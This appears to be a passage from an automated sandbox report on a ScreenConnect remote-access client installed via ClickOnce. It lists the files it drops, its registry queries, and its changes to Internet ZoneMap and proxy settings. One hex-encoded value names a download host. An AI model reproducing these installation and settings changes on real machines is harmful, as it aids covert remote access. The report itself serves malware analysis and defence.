N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\user.config C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
File opened for modification C:\Windows\system32\user.config C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133506775634894801" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178\DigestValue = 46be0d5a7db56cb1ad77274709d0db053a3c0999 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_6c2e4193f8f6130c C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1} C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56 = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "7GC7TZ6JY72V0NLXBWJELEDE" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 30003000300031002f00300031002f00300031002000300030003a00300030003a00300030000000 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\Files C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\DigestValue = a23587d95e94d7d5222b675867b3d525c2b4db5f C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Categories C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_fd4f63879c71b908\appid = 68747470733a2f2f6465736b746f6f6c2e62757a7a2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\Files C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\Files\ScreenConnect.WindowsClient.exe.config_f7 = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\lock!1a000000873e5c0e38060000c00a0000000000000000000 = 30303030303633382c30316461346662353339366665623738 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\lock!18000000873e5c0e38060000c00a0000000000000000000 = 30303030303633382c30316461346662353339366665623738 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\lock!0a000000878d5b0e541200008c0a0000000000000000000 = 30303030313235342c30316461346662353165363365313031 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\Files C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211 = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_24537eb26d6ad4ad C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\lock!0c000000878d5b0e541200008c0a0000000000000000000 = 30303030313235342c30316461346662353165363365313031 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\Files\ScreenConnect.Windows.dll_fc0d83aff7df0b5 = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178\Transform = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_6c2e4193f8f6130c C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_none_4a31edb78203a9e7\lock!10000000b68d5b0e541200008c0a0000000000000000000 = 30303030313235342c30316461346662353165363365313031 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
